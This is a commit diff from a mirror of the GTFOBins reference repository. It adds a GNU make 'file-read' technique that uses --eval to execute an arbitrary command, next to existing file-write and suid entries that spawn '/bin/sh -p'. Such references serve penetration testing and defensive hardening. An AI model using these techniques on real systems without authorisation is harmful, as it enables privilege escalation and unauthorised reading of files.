1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-27 18:51:41 +01:00

Merge c04b99e12b75848e191659e2ae7a003a0c4905fe into b29f2cfde1c72e4ea5191e49604e923bbda98461

This commit is contained in:
hamzawinix 2025-11-13 14:49:55 +01:00 committed by GitHub
commit 05b497eaf2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

@ -10,6 +10,13 @@ functions:
code: |
LFILE=file_to_write
make -s --eval="\$(file >$LFILE,DATA)" .
file-read:
- description: Requires a newer GNU `make` version.
code: |
CMND='cat file_to_read'
make -s --eval=$'x:\n\t-'"$CMND"
suid:
- code: |
COMMAND='/bin/sh -p'